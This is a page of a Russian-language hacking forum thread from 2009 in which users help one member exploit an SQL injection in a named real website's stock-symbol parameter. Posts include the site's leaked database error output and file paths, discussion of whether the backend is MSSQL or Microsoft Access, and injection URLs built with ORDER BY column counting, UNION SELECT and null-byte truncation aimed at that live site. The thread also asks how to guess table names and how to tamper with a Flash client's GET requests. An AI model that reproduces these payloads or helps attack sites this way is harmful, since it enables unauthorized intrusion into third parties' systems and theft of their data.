HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 983 из 2422 « Первая < 483883933973 979 980 981 982 983 984 985 986 987 9931033108314831983 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 10.11.2009, 02:17
ILYAtirtir
Участник форума
Регистрация: 25.04.2007
Сообщений: 176
С нами: 10024314

Репутация: 739
По умолчанию
если нету доступа к msysobjects,а так обычно и бывает,то только подбирать наугад таблицы.Можно ещё попробывать как здесь http://forum.antichat.ru/showpost.php?p=523825&postcount=36
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием

  #2  
Старый 10.11.2009, 02:37
warlok
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
С нами: 9594385

Репутация: 386
По умолчанию
Цитата:
что значит налету? если огнелисом пользуешься то есть соответсвующий плугин. (модификация http заголовков)
т.е. например есть флешка она отсылает гет запрос примерно такого вида http://localhost/gate.php?test=asdfg так вот в тот момент как она его отсылает мне надо поправить значение test. Пробывал тампер дату но как оказалось она такое неумеет, а ты про какой плагин говорил?
 
Ответить с цитированием

  #3  
Старый 10.11.2009, 02:39
[Forest]
Новичок
Регистрация: 07.11.2009
Сообщений: 23
С нами: 8688843

Репутация: 10
По умолчанию
Цитата:
Сообщение от warlok  
т.е. например есть флешка она отсылает гет запрос примерно такого вида http://localhost/gate.php?test=asdfg так вот в тот момент как она его отсылает мне надо поправить значение test. Пробывал тампер дату но как оказалось она такое неумеет, а ты про какой плагин говорил?
плагин для фф - Charles
 
Ответить с цитированием

  #4  
Старый 10.11.2009, 07:53
YuNi|[c
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
С нами: 10340793

Репутация: 66
По умолчанию
не могу раскрутит дальше
Код:
http://wallstreetcorner.com:80/ss2.html?Symbol='
можеть кто поможеть?

выдает:

Код:
An error occurred processing your request 
Merging data into macro form: e:\cyberspace\wallstreetcorner\ss2.html 
WebBase ODBC error in: {sql to Special source 'clients' user 'admin'}
**ODBC/driver/database error in sql statement: 
{sql to Special source 'clients' user 'admin'}
SELECT * FROM Situations WHERE Symbol = ''' ORDER BY ID
{/sql}

Using cached connection:: 'clients'/'admin'/' ' ('Microsoft Access Driver (*.mdb)' SYN 3804 11/09/09 21:16:35 EST 11/09/09 22:49:17 EST +1:32:42 0)

ODBC API call: 'statement executeDirect:' returned the following error message: '
{execDirect}[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression 'Symbol = ''' ORDER BY ID'. (sqlState: 37000) 
SELECT * FROM Situations WHERE Symbol = ''' ORDER BY ID

WebBase ODBC (EwXx08.120@Windows 2000 5.0) **

In file: e:\cyberspace\wallstreetcorner\ss2.html
 inserted by: e:\cyberspace\wallstreetcorner\disclaimer.html ;; near line number 6 

;; following starts near line number 7 in your source form...
...
{set Iaccept 'YES'}
{setUser userIaccept Iaccept}

{sql to Special source 'clients'  user 'admin'}
SELECT * FROM Situations WHERE Symbol = '{Symbol}'
ORDER BY ID
{/sql}

{forRow aRow on Special max 1}

...
**
 
Ответить с цитированием

  #5  
Старый 10.11.2009, 12:42
Krist_ALL
Banned
Регистрация: 14.01.2009
Сообщений: 515
С нами: 9116877

Репутация: 468


По умолчанию
MSSQL вроде, но что за дурацкая реакция на ошибку???
Кто знает?
не всегда же так.обчно просто строчка...ошибка там та и все.

Что имеем?
Тип БД - MSSQL
Раскрытие путей - e:\cyberspace\wallstreetcorner\disclaimer.html
запрос к бд - SELECT * FROM Situations WHERE Symbol = '11111111111'' ORDER BY ID
при Symbol=11111111111'

+ EwXx08.120@Windows 2000 5.0)

смотри как инекции проводить в mssql


гыгы сайт то не пашет http://wallstreetcorner.com/ss2.htm

и даже при http://wallstreetcorner.com/ss2.html?Symbol=1 ошибка)
Последний раз редактировалось Krist_ALL; 10.11.2009 в 12:46..
 
Ответить с цитированием

  #6  
Старый 10.11.2009, 12:45
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами: 9649706

Репутация: 3338


По умолчанию
Цитата:
Сообщение от Krist_ALL  
смотри как инекции проводить в mssql
Microsoft Access Driver
 
Ответить с цитированием

  #7  
Старый 10.11.2009, 12:46
Ins3t
Участник форума
Регистрация: 18.07.2009
Сообщений: 272
С нами: 8850336

Репутация: 330
По умолчанию
Цитата:
Сообщение от Krist_ALL  
MSSQL вроде, но что за дурацкая реакция на ошибку???
Кто знает?
не всегда же так.обчно просто строчка...ошибка там та и все.

Что имеем?
Тип БД - MSSQL
Раскрытие путей - e:\cyberspace\wallstreetcorner\disclaimer.html
запрос к бд - SELECT * FROM Situations WHERE Symbol = '11111111111'' ORDER BY ID
при Symbol=11111111111'

смотри как инекции проводить в mssql
Какой mssql??

Цитата:
ODBC API call: 'statement executeDirect:' returned the following error message: '
{execDirect}[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression 'Symbol = ''' ORDER BY ID'. (sqlState: 37000)
SELECT * FROM Situations WHERE Symbol = ''' ORDER BY ID
При чем здесь MSSQL ?
 
Ответить с цитированием

  #8  
Старый 10.11.2009, 15:52
YuNi|[c
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
С нами: 10340793

Репутация: 66
По умолчанию
Цитата:
Сообщение от Krist_ALL  
MSSQL вроде, но что за дурацкая реакция на ошибку???
Кто знает?
не всегда же так.обчно просто строчка...ошибка там та и все.

Что имеем?
Тип БД - MSSQL
Раскрытие путей - e:\cyberspace\wallstreetcorner\disclaimer.html
запрос к бд - SELECT * FROM Situations WHERE Symbol = '11111111111'' ORDER BY ID
при Symbol=11111111111'

+ EwXx08.120@Windows 2000 5.0)

смотри как инекции проводить в mssql


гыгы сайт то не пашет http://wallstreetcorner.com/ss2.htm

и даже при http://wallstreetcorner.com/ss2.html?Symbol=1 ошибка)
я уже пробовал стандартные методы инъекций

Код:
http://wallstreetcorner.com/disclaimer.html?Symbol=' пашет
 
Ответить с цитированием

  #9  
Старый 10.11.2009, 16:19
l1ght
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
С нами: 10227206

Репутация: 2163
По умолчанию
http://wallstreetcorner.com/disclaimer.html?Symbol='+order+by+45,46,47,48,49,5 0+union+select+1+from+Situations+where+'1
& use https://forum.antichat.ru/thread50550.html
/add краткость сестра таланта:
http://wallstreetcorner.com/disclaimer.html?Symbol='order+by+47%00
Последний раз редактировалось l1ght; 10.11.2009 в 16:34..
 
Ответить с цитированием

  #10  
Старый 10.11.2009, 19:48
YuNi|[c
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
С нами: 10340793

Репутация: 66
По умолчанию
Цитата:
Сообщение от l1ght  
http://wallstreetcorner.com/disclaimer.html?Symbol='+order+by+45,46,47,48,49,5 0+union+select+1+from+Situations+where+'1
& use https://forum.antichat.ru/thread50550.html
/add краткость сестра таланта:
http://wallstreetcorner.com/disclaimer.html?Symbol='order+by+47%00
спс |1ght я уже много раз прочитал ту статью. Твой линк помоему ничего не изменил вроде. Неужели от явного скуля нельзя что то делать?
 
Ответить с цитированием
Ответ
Страница 983 из 2422 « Первая < 483883933973 979 980 981 982 983 984 985 986 987 9931033108314831983 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.